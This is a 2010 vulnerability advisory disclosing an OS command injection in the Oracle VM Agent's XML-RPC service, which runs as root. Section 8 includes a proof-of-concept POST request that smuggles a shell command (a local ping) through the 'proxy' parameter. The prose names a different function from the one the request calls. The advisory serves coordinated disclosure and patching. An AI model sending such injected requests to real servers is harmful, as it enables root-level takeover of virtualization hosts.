Oracle Virtual Server Agent Command Injection
=============================================

1. Advisory Information
Advisory ID: BONSAI-2010-0109
Date published: 2010-10-13
Vendors contacted: Oracle
Release mode: Coordinated release

2. Vulnerability Information
Class: Injection
Remotely Exploitable: Yes
Locally Exploitable: Yes

3. Software Description
Oracle VM is server virtualization software which fully supports both
Oracle and non-Oracle applications. Oracle VM offers scalable, low-cost
server virtualization that is three times more efficient than existing
server virtualization products from other vendors. Oracle has also
announced certification of key Oracle products including Oracle
Database, Oracle Fusion Middleware, Oracle Applications, and Oracle Real
Application Clusters with Oracle VM.

Oracle VM Manager communicates with Oracle VM Agent to create and manage
guests on an Oracle VM Server. Oracle VM Agent is installed and
configured during the installation of Oracle VM Server.

By default, Oracle VM Agent is executed, with a highly privileged user,
typically root.

4. Vulnerability Description
Injection flaws, such as SQL, OS, and LDAP injection, occur when
untrusted data is sent to an interpreter as part of a command or query.
The attacker’s hostile data can trick the interpreter into executing
unintended commands or accessing unauthorized data.

5. Vulnerable packages
We ran our tests using Oracle Virtual Server release 2.2.0 with Oracle
VM Agent 2.3.

6. Non-vulnerable packages
Patch set 2.2.1 and above

7. Credits
This vulnerability was discovered by Nahuel Grisolia ( nahuel -at-
bonsai-sec.com ).

8. Technical Description
8.1. OS Command Injection
CVSSv2 Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Oracle VS Agent is prone to a remote command execution vulnerability
because the software fails to adequately sanitize user-supplied input.
Oracle VS Agent exposes through XML-RPC several functions. One of these
functions is validate_master_ip, which receives four parameters. The
second parameter "proxy", is vulnerable to command injection, because it
is not properly sanitized and its content is concatenated in an
operative system command, executed as a highly privileged user
(typically root).
The following POST message can be sent to the VM Agent XML-RPC port. By
doing this, the ping command is executed as follows:

POST /RPC2 HTTP/1.0
User-Agent: XML-RPC for PHP 3.0.0.beta
authorization: Basic XXXXXXXXXXXXXXX
Host: XXX.XXX.XXX.XXX:8899
Accept-Encoding: gzip, deflate
Accept-Charset: UTF-8,ISO-8859-1,US-ASCII
Content-Type: text/xml
Content-Length: 416

<?xml version="1.0"?>
<methodCall>
<methodName>utl_test_url</methodName>
<params>
<param>
<value><string>http://192.168.1.101</string></value>
</param>
<param>
<value><string>192.168.1.103'; ping –c 10 localhost; '</string></value>
</param>
<param>
<value><string>192.168.1.101</string></value>
</param>
<param>
<value><string>192.168.1.101</string></value>
</param>
</params>
</methodCall>

9. Report Timeline
• 2010-09-24 / Bonsai provides vulnerability information to ORACLE
• 2010-09-29 / Oracle confirms the vulnerability
• 2010-10-12 / Oracle published Critical Patch Update Fix
• 2010-10-13 / Public Disclosure

10. About Bonsai
Bonsai is a company involved in providing professional computer
information security services. Currently a sound growth company, since
its foundation in early 2009 in Buenos Aires, Argentina, we are fully
committed to quality service, and focused on our customers real needs.

11. Disclaimer
The contents of this advisory are copyright (c) 2010 Bonsai Information
Security, and may be distributed freely provided that no fee is charged
for this distribution and proper credit is given.

12. Research
http://www.bonsai-sec.com/en/research/vulnerability.php